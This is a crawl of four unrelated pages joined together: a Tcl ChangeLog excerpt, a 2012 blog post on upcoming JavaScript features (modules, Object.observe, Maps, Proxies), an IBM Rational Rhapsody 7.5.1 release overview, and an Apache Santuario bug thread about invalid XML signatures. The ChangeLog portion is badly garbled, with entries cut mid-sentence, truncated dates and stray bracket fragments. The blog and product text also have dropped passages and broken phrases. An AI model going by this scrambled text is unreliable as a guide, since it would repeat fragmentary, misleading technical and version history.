Make sure that tclWideIntType is defined and somewhat sensible everywhere. [Bug 713562]-01 Don Porter <[email protected]> * tests/README: Direct [source] of *.test files is no longer recommended. The tests/*.test files should only be evaluated under the control of the [runAllTests] command in tests/all.tcl. Don Porter <[email protected]> * doc/tcltest.n: * library/tcltest/tcltest.tcl: Added reporting during [configure -debug 1] operations to warn about multiple uses of the same test name. [FR 576693] Replaced [regexp] and [regsub] with [string map] where possible. Thanks to David Welton. [Bugs 667456,667558] * library/tcltest/pkgIndex.tcl: Bumped to tcltest 2.2.3 *, [Bugs 631741] (Chris Darroch) and [696893] (David Hilker).> * doc/Eval.3 (Tcl_EvalObjEx): Corrected CONST and * doc/ParseCmd.3 (Tcl_EvalTokensStandard): return type errors in documentation. [Bug 683994]-18 Vince Darley <[email protected]> * tests/cmdAH.test: fix test suite problem if /home is a symlink * generic/tclIOUtil.c: fix bad error message with 'cd ""' * win/tclWinFile.c: allow Tcl to differentiate between reparse points which are symlinks and mounted drives. These changes fix [Bugs 703264, 704917, 697862] respectively._FileObjCmd): Remove assumption that file times and longs are the same size. [Bug 698146] (Tcl_FormatObjCmd): Stop surprising type conversions from happening when working with integer and wide values. [Bug 699060] * Kevin Kenny <[email protected]> * win/makefile.vc: Backed the version to 8.4 on the 8.4 branch. (I just loathe sticky tags). 2003-03-12 Don Porter <[email protected]> *CmdMZ.c (Tcl_SubstObj): Corrected and added test for * tests/subst.test (subst-2.4): Tcl_SubstObj's incorrect halting of substitution at the first \x00 byte. [Bug 685106] *-08 Don Porter <[email protected]> * doc/tcltest.n: Added missing "-body" to example. Thanks to Helmut Giese. [Bug 700011] * tests/string.test: failing that it can't handle strings or * tests/stringComp.test: patterns with. Fixes [Bugs 655645, 615043,iler. 2002 ths * * generic/tcl.h: of CVS snapshots with the actual 8.4.0 * tools/tcl.wse.in: release. *] (sofer)] (lvirden)] (dgp) * doc/Concat.3: all remaining public interfaces of Tcl. * doc/CrtCommand.3: Notably, the parser no longer writes on * doc/CrtSlave.3: the string it is parsing, so it is no * doc/CrtTrace.3: longer necessary for Tcl_Eval() to be * doc/Eval.3: given a writable string. Also, the * doc/ExprLong.3: refactoring of the Tcl_*Var* routines * doc/LinkVar.3: by Miguel Sofer is included, so that the * doc/ParseCmd.3: "part1" argument for them no longer needs * doc/SetVar.3: to be writable either. * doc/TraceVar.3: * doc/UpVar.3: Compatibility support has been enhanced so * generic/tcl.decls: that a #define of USE_NON_CONST will remove * generic/tcl.h: all possible source incompatibilities with * generic/tclBasic.c: the 8.3 version of the header file(s). * generic/tclCmdMZ.c: The new #define of USE_COMPAT_CONST now does * generic/tclCompCmds.c:what USE_NON_CONST used to do -- disable * generic/tclCompExpr.c:only those new CONST's that introduce * generic/tclCompile.c: irreconcilable * tests/ioUtil.test: when the current directory is * tests/regexp.test: not writable... * tests/regexpComp.test: * tests/source.test: * tests/unixFile.test: * tests/unixNotfy.test: * tests/unixFCmd.test: Trying to make these test-files * tests/macFCmd.test: not bomb out with an error when * tests/http.test: the current directory is not * tests/fileName.test: writable... * * unix/tclUnixPipe.c: TclOS* because they are only used * unix/tclUnixFile.c: internally. Also stopped double-#def * unix/tclUnixFCmd.c: of TclOSlstat [Bug 566099,, [Bugs 493995, * unix/Makefile.in: when * tests/parseOld.test: and exports a [configure] command * tests/tcltest.test: from tcltest. 2002-06-22 Don Porter <[email protected]> * changes: updated changes file for 8.4b1 release. * library/tcltest/tcltest.tcl: Corrections to tcltest and the * tests/basic.test: Tcl test suite so that a test * tests/cmdInfo.test: with options -constraints knownBug * tests/compile.test: -limitConstraints 1 only tests the * tests/encoding.test: knownBug tests. Mostly involves * tests/env.test: replacing direct access to the * tests/event.test: testConstraints array with calls * tests/exec.test: to the testConstraint command * tests/execute.test: (which to * win/Makefile.in: match current Major.minor versions of the * win/makefile.bc: packages. Added tcltest package to * win/makefile.vc: mis-understanding. [Bug 536955] (dgp) *. [Bug. Fixes .sourceforge. Fixes " *** ******************************************************************
http://opensource.apple.com//source/tcl/tcl-97.1/tcl84/tcl/ChangeLog
CC-MAIN-2016-40
en
refinedweb
A Few New Things Coming To JavaScript November 22, 2012 . ES.next implementation. Modules Car { // import … // export … } A module instance is a module which has been evaluated, is linked to other modules or has lexically encapsulated data. An example of a module instance is: module myCar at "car.js"; module declarations can be used in the following contexts: module UniverseTest {}; module Universe { module MilkyWay {} }; module MilkyWay = 'Universe/MilkyWay'; module SolarSystem = Universe.MilkyWay.SolarSystem; module MySystem = SolarSystem; An export declaration declares that a local function or variable binding is visible externally to other modules. If familiar with the module pattern, think of this concept as being parallel to the idea of exposing functionality publicly. module Car { // Internal var licensePlateNo = '556-343'; // External export function drive(speed, direction) { console.log('details:', speed, direction); } export module engine{ export function check() { } } export var miles = 5000; export var color = 'silver'; }; Modules import what they wish to use from other modules. Other modules may read the module exports (e.g drive(), miles etc. above) but they cannot modify them. Exports can be renamed as well so their names are different from local names. Revisiting the export example above, we can now selectively choose what we wish to import when in another module. We can just import drive(): import drive from Car; We can import drive() and miles: import {drive, miles} from Car; Earlier, we mentioned the concept of a Module Loader API. The module loader allows us to dynamically load in scripts for consumption. Similar to import, we are able to consume anything defined as an export from such modules. // Signature: load(moduleURL, callback, errorCallback) Loader.load('car.js', function(car) { console.log(car.drive(500, 'north')); }, function(err) { console.log('Error:' + err); }); load() accepts three arguments: moduleURL: The string representing a module URL (e.g "car.js") callback: A callback function which receives the output result of attempting to load, compile and then execute the module errorCallback: A callback triggered if an error occurs during loading or compilation. What about classes?: module widgets { // ... class DropDownButton extends Widget { constructor(attributes) { super(attributes); this.buildUI(); } buildUI() { this.domNode.onclick = function(){ // ... }; } } } Followed by today's de-sugared approach that ignores the semantic improvements brought by ES.next modules over the module pattern and instead emphasises our reliance of function variants: var widgets = (function(global) { // ... function DropDownButton(attributes) { Widget.call(this, attributes); this.buildUI(); } DropDownButton.prototype = Object.create(Widget.prototype, { constructor: { value: DropDownButton }, buildUI: { value: function(e) { this.domNode.onclick = function(e) { // ... } } } }); })(this);. Where do these modules fit in with AMD?. Use it today Object.observe() The idea behind Object.observe is that we gain the ability to observe and notify applications of changes made to specific JavaScript objects. Such changes include properties being added, updated, removed or reconfigured.. // A model can be a simple object var todoModel = { label: 'Default', completed: false }; // Which we then observe Object.observe(todoModel, function(changes) { changes.forEach(function(change, i) { console.log(change); /* What property changed? change.name How did it change? change.type Whats the current value? change.object[change.name] */ }); }); // Examples todoModel.label = 'Buy some more milk'; /* label changed It was changed by being updated Its current value is 'Buy some more milk' */ todoModel.completeBy = '01/01/2013'; /* completeBy changed It was changed by being new Its current value is '01/01/2013' */ delete todoModel.completed; /* completed changed It was changed by being deleted Its current value is undefined */ Availability: Object.observe will be available in Chrome Canary behind the "Enable Experimental JS APIs" flag. If you don't feel like getting that setup, you can also checkout this video by Rafael Weinstein discussing the proposal. Use it today - Special build of Chromium - Watch.JS appears to offer similar behaviour, but isn't a polyfill or shim for Object.observeoutright Read more (Rick Waldron). Default Parameter Values Default parameter values allow us to initialize parameters if they are not explicitly supplied. This means that we no longer have to write options = options || {};. The syntax is modified by allowing an (optional) initialiser after the parameter names: function addTodo(caption = 'Do something') { console.log(caption); } addTodo(); // Do something Only trailing parameters may have default values: function addTodo(caption, order = 4) {} function addTodo(caption = 'Do something', order = 4) {} function addTodo(caption, order = 10, other = this) {} Traceur demo Availability: FF18 Block Scoping Block scoping introduces new declaration forms for defining variables scoped to a single block. This includes: let: which syntactically is quite similar to var, but defines a variable in the current block function, allowing function declarations in nested blocks const: like let, but is for read-only constant declarations. var x = 8; var y = 0; let (x = x+10, y = 12) { console.log(x+y); // 30 } console.log(x + y); // 8 let availability: FF18, Chrome 24+ const availability: FF18, Chrome 24+, SF6, WebKit, Opera 12 Maps and sets Maps: has(key): a boolean check to test if a key exists delete(key): deletes the key specified from the map size(): returns the number of stored name-value pairs let m = new Map(); m.set('todo', 'todo'.length); // "something" → 4 m.get('todo'); // 4 m.has('todo'); // true m.delete('todo'); // true m.has('todo'); // false Availability: FF18 Read more (Nicholas Zakas) Use it today Sets)- adds the value to the set. delete(value)- sets the value for the key in the set. has(value)- returns a boolean asserting whether the value has been added to the set let s = new Set([1, 2, 3]); // s has 1, 2 and 3. s.has(-Infinity); // false s.add(-Infinity); // s has 1, 2, 3, and -Infinity. s.has(-Infinity); // true s.delete(-Infinity); // true s.has(-Infinity); // false One possible use for sets is reducing the complexity of filtering operations. e.g: function unique(array) { var seen = new Set; return array.filter(function (item) { if (!seen.has(item)) { seen.add(item); return true; } }); } This results in O(n) for filtering uniques in an array. Almost all methods of array unique with objects are O(n^2) (credit goes to Brandon Benvie for this suggestion). Availability: Firefox 18, Chrome 24+ Read more (Nicholas Zakas) Use it today Proxies The Proxy API will allow us to create objects whose properties may be computed at run-time dynamically. It will also support hooking into other objects for tasks such as logging or auditing. var obj = {foo: "bar"}; var proxyObj = Proxy.create({ get: function(obj, propertyName) { return 'Hey, '+ propertyName; } }); console.log(proxyObj.Alex); // "Hey, Alex" Also checkout Zakas' Stack implementation using ES6 proxies experiment. Availability: FF18, Chrome 24 Read more (Nicholas Zakas) WeakMaps. let m = new WeakMap(); m.set('todo', 'todo'.length); // Exception! // TypeError: Invalid value used as weak map key m.has('todo'); // Exception! // TypeError: Invalid value used as weak map key let wmk = {}; m.set(wmk, 'thinger'); // wmk → 'thinger' m.get(wmk); // 'thinger' m.has(wmk); // true m.delete(wmk); // true m.has(wmk); // false So again, the main difference between WeakMaps and Maps is that WeakMaps are not enumerable. Use it today Read more (Nicholas Zakas) API improvements Object.is(0, -0); // false Object.is(NaN, NaN); // true 0 === -0; // true NaN === NaN; // false Availability: Chrome 24+ Use it today Array.from Array.from: Converts a single argument that is an array-like object or list (eg. arguments, NodeList, DOMTokenList (used by classList), NamedNodeMap (used by attributes property)) into a new Array() and returns it; Converting any Array-Like objects: Array.from({ 0: 'Buy some milk', 1: 'Go running', 2: 'Pick up birthday gifts', length: 3 }); The following examples illustrate common DOM use cases: var divs = document.querySelectorAll('div'); Array.from(divs); // [<div class="some classes" data-</div>, <div data-</div>] Array.from(divs).forEach(function(node) { console.log(node); }); Use it today Conclusions.
https://addyosmani.com/blog/a-few-new-things-coming-to-javascript/
CC-MAIN-2016-40
en
refinedweb
Overview Rational Rhapsody 7.5.1 The IBM® Rational® Rhapsody® 7.5.1 product release extends this development environment's systems engineering, software development, and testing capabilities with several new features and integrations that help improve the specification, design, development, documentation, and test of systems and products. Some of the new capabilities include: - Manage quality using integrations with the IBM® Rational® Quality Manager (RQM) solution and the IBM Rational Rhapsody TestConductor Add On - Develop automotive systems — from concept to code delivery — using AUTOSAR - Leverage the Systems Modeling Language (SysML) to clarify complex systems engineering projects - Integrate information and generate documentation from multiple tools using the IBM® Rational® Publishing Engine™ - Customize C++ code generation to meet your coding standards - Visually debug existing code more easily using animation - Improve local language use with the Japanese language version of the Rational Rhapsody environment These new features, plus other enhancements, helps systems engineers and software developers collaborate better, delivering high quality systems faster. Full test life cycle using the Rational Quality Manager and Rational TestConductor integration Quality assurance teams are often brought into the development lifecycle too late – after requirements are set and errors introduced into the design. To remedy this, IBM has integrated the Rational Rhapsody TestConductor and the IBM® Rational® Quality Manager solutions so that they create a live test plan that spans the entire product life cycle, providing a consolidated view from requirements to final product delivery. By bringing model-based tests into your overall testing suite, this integration helps you use the Rational Quality Manager solution to enhance your model-based testing inside a powerful generic framework. The integration works by using the Rational Quality Manager solution to manage different kinds of tests, test executions and tests results; the Rhapsody TestConductor tool uses the UML testing profile to automatically specify the test architectures and test cases, executing the tests to pinpoint design model failures. The Rational Quality Manager displays requirements, test cases, and other resources in one server-based document, helping geographically dispersed team members exchange information in realtime. The integration also helps enable risk-based testing, assisting QA teams as they prioritize testing of specific features and functions based on their importance in the overall project and likelihood or impact of failure. The ability to prioritize, combined with new reporting dashboards, offers product managers a more realistic view into product performance against set business objectives to better ensure that your project stays successfully on track. Figure 1: Manage Rational TestConductor tests with Rational Quality Manager Rational Publishing Engine integration You can extract information from the Rational Rhapsody model for publishing with the Rational Publishing Engine. The Rational Publishing Engine is an automated document generation solution designed to produce documentation from systems and software engineering data. Such documentation is often subject to complex style and format requirements imposed by internal standards groups, customers, suppliers, partners even government or industry regulatory bodies. The Rational Publishing Engine is optimized for ease-of-use, scalability, and can be used as another option for report generation in addition to Rational Rhapsody, the Rational Publishing Engine provides extractors to products, including: - IBM® Rational® DOORS® - IBM® Rational® Tau® - IBM® Rational® ClearCase® - IBM® Rational® ClearQuest® - IBM® Rational® Quality Manager - IBM® Rational® Focal Point™ - IBM® Rational® TestManager - IBM® Rational® RequisitePro® - IBM® Rational® Requirements Composer - third party tools such as REST enabled and XML data sources Figure 2: Rational Rhapsody information can be included in Rational Publishing Engine templates Systems engineering improvements Systems engineers are turning to the Object Management Group's (OMG) SysML language to specify their designs and analyze complex requirements, using a standard language to collaborate and deliver cohesive specifications. The Rational Rhapsody 7.5.1 solution provides refinements with SysML 1.1 that help improve the display of information on block definition diagrams, internal block diagrams and activity diagrams. In addition, systems engineers can take advantage of Eclipse support for the systems engineering editions of the Rational Rhapsody environment — which enables systems engineers to utilize the Rhapsody tool within the IBM® Rational® Team Concert environment. Block definition diagram and internal block diagram improvements You can now view attributes, operations, flow ports and ports inherited from super blocks on block definition and internal block diagrams and features dialog of the derived class. This is done through a check box in the display options dialog on diagrams, or in the features dialog of a block or class. This feature also works for UML. Figure 3: Viewing attributes and operations of super blocks and classes You can also use the display option operation to show compartments for association ends and parts on block definition diagrams, internal block definition diagrams or UML class diagrams. Figure 4: Display compartments with association ends and parts Improvements to the display of flow port information on diagrams are available in the Rational Rhapsody 7.5.1 solution through the display options operation. A new tab for flow ports is added to the features dialog of blocks. Figure 5: Display flow port information in new tab When using SysML with the Rhapsody 7.5.1 environment, by default when you drag a part onto another block that does not own it, a reference part is created with dashed lines. If you want to change the parent of the part, right click it and choose the reparent operation. This behavior is controlled by the property General:Graphics:AllowObjectReparenting. Setting this property to True will automatically reparent the part. Figure 6: Reference properties appear as dashed lines You can now display ports of a class or a block diagram on its internal block diagram frames. Figure 7: Display ports on diagram frame Activity diagram enhancements Activity diagrams are improved in the Rational Rhapsody 7.5.1 tool, specifying parts on activity diagram swimlanes so that they represent internal behavior, showing parameters on activity diagram frames and displaying more information about pins. Figure 8: Swimlanes and activity partitions representing parts Figure 9: Activity parameters on diagram frame Figure 10: Display options for pins Callout notation for "allocation to" and "allocation from" Representing allocation information is easily in a comment using the Rational Rhapsody 7.5.1 solution. Two new properties are created for SysML with Rhapsody for comments: Model:Comment:IsCallOut and Model:Comment:CallOutCompartments. After you draw the allocation relationships, create a comment. Set the property Model:Comment:IsCallOut of the comment to be True. Draw an anchor to the source or target of the allocation and the comment will become a "callout" showing the allocated from / to relationship. Figure 11: Display allocation information in comment Parametric diagram binding connector alignment The Rational Rhapsody 7.5.1 solution features improvements to the SysML binding connector on parametric diagrams capability so that you can set the compositional context of attributes. The context is set by a dialog box, invoked by right clicking on the attribute and selecting "Bind to context". In addition, three tags are added to the binding connector: - SourceContext: the context of the source end of the binding connector - TargetContext: the context of the target end of the binding connector - Value: the value shared by the source and the target ends (both need to have the same value)May Figure 12: Binding attribute to a context Systems engineering with Eclipse and Rational Team Concert The IBM® Rational® Rhapsody® Designer for Systems Engineers and the IBM® Rational® Rhapsody® Architect for Systems Engineers tools are now supported within the Eclipse platform. A specialized modeling perspective for systems engineers is available to provide a SysML and UML modeling environment tailored for systems engineers. Working within the Eclipse environment helps enable systems engineers to take advantage of capabilities of Eclipse, such as being able to perform team collaboration using Rational Team Concert. MODAF service views The Ministry of Defence Architecture Framework (MODAF) support in the Rational Rhapsody DoDAF, MODAF and UPDM Add On solution is upgraded with the inclusion of service views, offering support for the MODAF 1.2 standard. Embedded software development improvements The Rational Rhapsody 7.5.1 solution helps improve support for software developers targeting embedded and real-time systems with customizable C++ code generation for better control over generated code. In addition, the tool provides more compliance with MISRA C++ standard in generated code and framework, and improves animation of existing code to help validate it without minimal impact on code. The latest refinements improve synchronizing model and code information when roundtripping capabilities, too. Visual debugging of existing code Most development projects do not start from scratch, but attempt to use an existing code base. To effectively leverage this code base, it is important to understand how it works and validate that it works properly. This is a challenge if the code documentation has not been maintained. The Rational Rhapsody 7.5.1 product helps you meet this challenge by improving the animation of reverse engineered code allowing you to add instrumentation for animation, validate the code and then remove the instrumentation to return to the original code. This capability is enabled for C and C++ code by applying the "codecCentric" settings to the model, and it occurs automatically when reverse engineering code. You can enable animation from the configuration settings, or by context menu of a sequence diagram. Roundtripping improvements The Rational Rhapsody 7.5.1 environment helps improve your ability to work in the model or code and to synchronize any changes you make in either view. You can now roundtrip the manually entered portion of a constructor's initializer for C++ code. Also, you are able to reorder the struct and union attributes in code and your model will maintain this order. Finally, you can add or remove namespaces in code, and the model is updated to reflect these changes when you use C++ with the code centric settings applied. Generation of associations as references Developers using C++ can specify that an association between two classes be implemented as a reference, instead of a pointer, to provide greater control over generated application. A field is provided to specify the initial value of the reference. Figure 13: Using references for associations Larger view of Figure 13. Code Generation Customization The Rational Rhapsody 7.5.1 solution provides you with the ability to further customize C++ code e generation to help deliver applications meeting corporate and industry mandated coding standards. The code generation process consists of two phases. The first phase is simplification, which transforms the model into a simpler version. The writing phase follows, which translates the simplified model into code. By modifying properties to control the output, some customization of code generation could always be done in the Rhapsody tool. To make this an easier process, hooks are now provided to create helpers using standard Rhapsody API's that can manipulate the simplification phase to create a simplified model that translates into C++ code. Figure 14: Define helpers to customize C++ code generation AUTOSAR concept-to-code workflow IBM Rational Rhapsody 7.5.1 environment offers improved support for the AUTOSAR (AUTomotive Open System ARchitecture) standard by adding a transition from the AUTOSAR software architecture to the behavioral software designed using the Unified Modeling Language (UML) — generating C code for the entire software component that integrates with the AUTOSAR RTE. The Rhapsody solution helps enable a workflow where you can define and dynamically analyze your requirements in SysML so that it flows into the software architecture and behavior designed using UML. From here you can generate your production application C code, integrating it with the AUTOSAR RTE. Figure 15: Model behavior targeting AUTOSAR Larger view of Figure 15. Improved MISRA C++ compliance The Rational Rhapsody tool's code generation and framework is enhanced to support more guidelines recommended for MISRA C++, helping your teams create more reliable and safer code. AUTOSAR authoring using Eclipse The Rhapsody 7.5.1 environment helps enable teams using the AUTOSAR authoring profile to leverage the Eclipse platform integration for authoring, import and export of ARXML files. New event implementation using MicroC profile A new implementation for events is provided when using the MicroC profile that assists MISRA-C compliance of generated C code when you are working in the Rational Rhapsody Developer for C++, C and Java tool. A single reference type, RiCEvent, is used for all generated events and also holds a reference to the event's data (if any exists), and a dedicated type is generated only for events with data. The memory management for generated events in the generated code and RiCEvent in the MicroC framework is changed so that it no longer uses the RiCMemoryManager. Instead, each event is allocated an RiCEvent from the MicroC framework from a dedicated, customizable, fixed size pool of RiCEvent reference types. If you are working with an event with data, an additional customizable, fixed size pool is generated to allocate your data part of the event. Support active files with MicroC The Rational Rhapsody 7.5.1 toolset extends the support of the Extended Execution Model used with MicroC profile to include active files. Framework Compilation for MicroC model The Rational Rhapsody Developer for C tool helps optimize your application's build process using the MicroC framework by only compiling the framework if there were changes that require it to reduce the amount of time in the build process. Improved hierarchical repository management The Rhapsody solution is able to store model information in a flat or hierarchical fashion where each package in the model is represented as a directory in the file systems. The Rhapsody tool helps improve synchronization of the model and configuration management repository when renaming, moving, deleting, specifying a package so that it is stored as a directory or converted to a package as a directory to flat structure. When these operations occur, an appropriate action is performed in the configuration management repository to restructure it to reflect the Rational Rhapsody model. This capability is available when using Rational ClearCase or IBM® Rational® Synergy™ 7.1 (or later) and the MSSCCI 2.1 (or later) products. Synchronization is enabled with the properties RenameDirectoryActivation, MoveDirectoryActivation, DeleteDirectoryActivation, and StoreInSeparateDirectoryActivation under ConfigurationManagement:SCC. Improvements for Ada development The IBM® Rational® Rhapsody® in Ada™ tool includes new capabilities to model static classes to help you develop safety critical applications through improvements to the reverse engineering of existing code, and the creation of custom makefiles features. A static class is an Ada package that contains only static attributes and operations and this construct is supported for code generation, reverse engineering and animation. Existing Ada code bases can be visualized in the modeling environment using reverse engineering of the code while preserving the original source code, assisting your process with better design understanding and documentation. The code can be used within the Rhapsody model and compiled and linked into your Rhapsody project. Lastly, new features make it easier to create a new compiler environment with the ability to create new makefile templates to support the environment. Improvements Rational Developer RulesComposer Add On The Rational Developer RulesComposer Add On tool allows you to read models from IBM® Rational® Rose® MDL files, helping enable you to create a rule set that can transform a Rational Rose model. In addition, external file mapping rules are provided that allow you to edit all generated files in the Rational Rhapsody environment — even if the rule set customizes the filenames and project folder tree, creates more than two files per object to generate or customizes the make and main files. The Rhapsody meta model in the Rhapsody Developer RulesComposer tool is updated to include improvements on tag data stored in the model, such as: - Multiplicity - Value specification - Literal specification - Instance value Enhancements to the Rhapsody family of products and complementary solutions XMI customization and Rational Tau and Rational Statemate support The IBM® Rational® Rhapsody® Developer RulesComposer Add On™ product now includes rule sets for XMI import and export features, helping you customize the import and export functions of your model information. XMI Rule sets are included for the Rational Rhapsody, Rational Tau 4.3, and the IBM® Rational® Statemate® 4.6 solutions, helping enabling you to customize the exchange of information between those tools or any other modeling tool that uses XMI. A Rational Rhapsody installation is required to launch the export and import functions from the Rational Tau or Rational Statemate solutions. XMI support for SysML 1.1 The import and export of SysML 1.1 information is enhanced in the Rational Rhapsody 7.5.1 solution to help improve exchange of behavioral flow ports, satisfy relationships and viewpoints, benefitting you with a more effective exchange of model information using SysML 1.1. OMG Model Interchange Working Group (MIWG) IBM is participating with other vendors in the (OMG's model interchange working group) to help improve the interoperability and exchange of model information between tools. The Rational Rhapsody solution's XMI support is validated at least through MIWG test case 2 with some validation into test case 3. Partial import and export of XMI Frequently, your project development team wants to exchange only a subset of a model. The XMI import and export capability now provides an option to import or export only a portion of the model information, offering more flexibility and scalability when exchanging model information. Rational ClearCase Remote Client Support is now provided for using Rational ClearCase Remote Client when using the Eclipse platform integration of Rational Rhapsody enabling developers leveraging the development capabilities provided with Eclipse to perform team collaboration with Rational ClearCase. New help system To provide a better user experience, the IBM Rational Rhapsody 7.5.1 solution now uses the IBM Rational help system. The help system provides a variety of ways to find the information you need. The table of contents is organized into task categories. Browse each category to see the hierarchy of general tasks and their supporting child tasks, or use the powerful search and index functions to browse information by keyword. While working in the product, you can access context-sensitive help by pressing F1. For more information about using the help system, open the help and search for "Help system overview". Figure 16: The new help system is easier to navigate Larger view of Figure 16. Japanese version of the Rhapsody environment The IBM Rational Rhapsody model-driven development solution is available in a Japanese version with a Japanese language interface, with Japanese context sensitive help and Japanese documentation tools. Additionally, an integration with the IBM Rational Publishing Engine™ product allows generated documentation to contain Japanese characters. Multi-byte support is enabled, by default, to allow you enter Japanese characters into the description and label fields of your Rhapsody model. Multiple instances of Simulink block The Rational Rhapsody toolset's interface with The MathWorks™ Simulink® environment is improved, allowing you to create multiple instances of the same Simulink block object within the Rational Rhapsody model so that you can simulate more complex architectures and controls. Improved Rational SDL Suite interface The interface to the IBM® Rational SDL Suite™ is improved with capabilities designed to help you model protocols and architecture together, including: - Support for SDL Suite models containing SDL packages - Import user defined types (signal parameters) - Support by pointer parameter (char*) data transfer - Support RPC ( Remote Procedure Call) - Support SDL threaded integration models Improved Rational System Architect interface The Rational Rhapsody 7.5.1 solution offers an improved integration with the IBM® Rational® System Architect™ tool by enhancing the information import feature between the tools, so that it exchanges more information from high-level architecture modeling into the Rhapsody environment. New capabilities include: - Import of all diagrams - Import multiple diagrams in one session - Creation and population of diagrams automatically - Import of all attributes - Dynamic selection of import map - Improved handling of duplicate elements - Improved import wizard Improved Siemens Teamcenter Integration When you use the Siemens Teamcenter® product with Rational Rhapsody environment, you can take advantage of improved support for import and export of more types including: - Dependencies without stereotypes, - Actions in activity diagrams and attributes of actions - Action blocks along with sub-actions - Object nodes in activity diagrams along with "State" attributes - "ID" and "Specification" attributes of requirements - Constraints along with "Specification" attributes of constraints - Control flows and initial flows between actions in activity diagrams. The following items are only exported from the Rhapsody solution to the Teamcenter product: - "Represents" attribute of object node in activity diagram - "Anchored Elements" attribute of constraints - Export swimlanes in activity diagrams from Rhapsody with "Represents" attributes Wind River Workbench 3.1 support The IBM® Rational® Rhapsody® Developer™ 7.5.1 solution offers support for the Wind River® Workbench 3.1 and Wind River VxWorks 6.7products. In addition, support has been dropped for Wind River Workbench 2.6 product. Summary The Rational Rhapsody 7.5.1 solution provides an integrated product development environment that helps you improve your systems engineering and embedded software designs, from initial requirement analysis to design implementation and test. You are able to manage quality as an integral part of the development process, assisting efforts for development and test to work together with an integration between the Rational Rhapsody TestConductor and the IBM® Rational® Quality Manager products. Systems engineers are able to use improved SysML 1.1 capabilities to specify and manage designs more flexibly. Software developers can reuse and understand existing software, helping you deliver robust applications that meet safety standards and target automotive applications using improved AUTOSAR features. The Rational Rhapsody 7.5.1 solution provides an integrated systems engineering and embedded software delivery solution that helps facilitate team collaboration, promotes quality and maintains design information consistency. IBM Rational Rhapsody packaging changes Integrations with other IBM Rational products are now included within the IBM Rational Rhapsody base products for users on active maintenance (Subscription and Support). IBM Rational Rhapsody base products are: - IBM Rational Rhapsody Developer V7.5.1 - IBM Rational Rhapsody Developer for Ada V7.5.1 - IBM Rational Rhapsody Developer for C++, C, and Java V7.5.1 - IBM Rational Rhapsody Architect for Software V7.5.1 - IBM Rational Rhapsody Architect for Systems Engineers V7.5.1 - IBM Rational Rhapsody Designer for Systems Engineers V7.5.1 Packaging changes The IBM Rational Rhapsody Interfaces Add On is no longer available for new license purchase but the product’s functionality is distributed into the base IBM Rational Rhapsody products and the IBM Rational Rhapsody Tools and Utilities Add on. Users who previously purchased the IBM Rational Rhapsody Interfaces Add On can continue purchasing renewal Subscription and Support (maintenance) for their current licenses. In the future, if they wish to add additional licenses for XMI and the MathWorks Simulink interface, they will need to purchase the IBM Rational Rhapsody Tools and Utilities Add On. The IBM Rational Rhapsody Gateway Add On is no longer offered as a separate product for new license purchase. Basic IBM Rational DOORS and IBM Rational Requisite Pro export of model information is moved into the Rational Rhapsody base products. All other capabilities in the IBM Rational Rhapsody Gateway Add On (including but not limited to impact analysis, coverage analysis, interfaces to other non-IBM requirements management tools, and advanced capabilities of the IBM Rational DOORS and IBM Rational Requisite Pro interfaces) are moved into the IBM Rational Rhapsody Tools and Utilities Add On. Users who have previously purchased the IBM Rational Rhapsody Gateway Add On can continue purchasing renewal Subscription and Support (maintenance) for their current licenses. In the future, if they wish to add additional licenses for impact analysis, coverage analysis, interfaces to other non-IBM requirements management tools, and advanced capabilities of the IBM Rational DOORS and IBM Rational Requisite Pro interfaces, they will need to purchase the IBM Rational Rhapsody Tools and Utilities Add On. Resources Learn - Learn more about IBM Rational Rhapsody. - Learn more about IBM Rational Quality Manager. - Learn more about IBM Rational Publishing Engine. - Explore the Rational Rational Rhapsody Information Center. -. -
http://www.ibm.com/developerworks/rational/library/09/whatsnewinrationalrhapsody-7-5-1/
CC-MAIN-2016-40
en
refinedweb
Details Description When generating Enveloping signatures in 1.4.5, they are invalid. These signatures worked in 1.4.4, but now do not work in 1.4.5 Activity - All - Work Log - History - Activity - Transitions The test is generating the signature using the org.apache.xml.security APIs, and validating the signature using the JSR 105 APIs (javax.xml.crypto). It seems like a bug or interoperability issue between JDK 6 and Apache Santuario 1.4.5. I believe you are using JDK 6 right? If so, you are by default using the JSR 105 implementation from JDK 6 and not the one bundled with XMLSec 1.4.5. See my blog entry on how to use JDK 6 or later and override it with the JSR 105 implementation in Santuario: When I tested with the JSR 105 implementation in Santuario 1.4.5 I did not see the problem. I'll need to investigate this issue a bit more first to see what the problem may be, and whether it is in JDK 6 or Santuario. Possibly/probably some sort of a C14N issue. I think it's an issue with Santuario 1.4.5. In our particular use case we're generating signatures with Java and verifying them with C++. Your test sample seems to be problematic to begin with, you can't use xml as a namespace prefix unless it's defined to be what XML requires (it's reserved). I'm surprised it's parseable, but the bug may simply be a lack of proper error checking for that situation in one of the libraries. In any case, I'd start by using something other than "xml" and see what happens. I'll be the first to admit I'm a novice at best when it comes to XML and understanding namespaces, baseURIs and all other fun stuff it has. However, it seems as though that is the issue. Changing the XML in my test code to String xml = "<test><foo>bar</foo></test>"; results in valid signatures for both 1.4.4 and 1.4.5. So I agree/think that it should probably not generate a signature for the XML if I've screwed it up and/or throw some kind of exception during signing or verification. Thanks for the help though! It's hard to say exactly what it should do, but I would suggest keeping this open for investigation into what layer is behaving oddly. I'm not really surprised the parsers are broken enough to accept this, and having done that, it's not likely we could or should be just refusing to sign it. The checking alone would add inefficiencies that other people shouldn't pay for. As far as the bug, c14n handles the XML namespace (the one hardwired to that prefix) very particularly, and there's no such thing as an element in that namespace. So I'm sure there's just some code getting confused, and probably behaving differently in different implementations. But it would be good to know where. It also may mean there's a regression somewhere involving c14n of the xml namespace declaration itself, which was an older bug. Sample code that when run with 1.4.4 is valid, invalid in 1.4.5
https://issues.apache.org/jira/browse/SANTUARIO-278?attachmentOrder=desc
CC-MAIN-2016-40
en
refinedweb
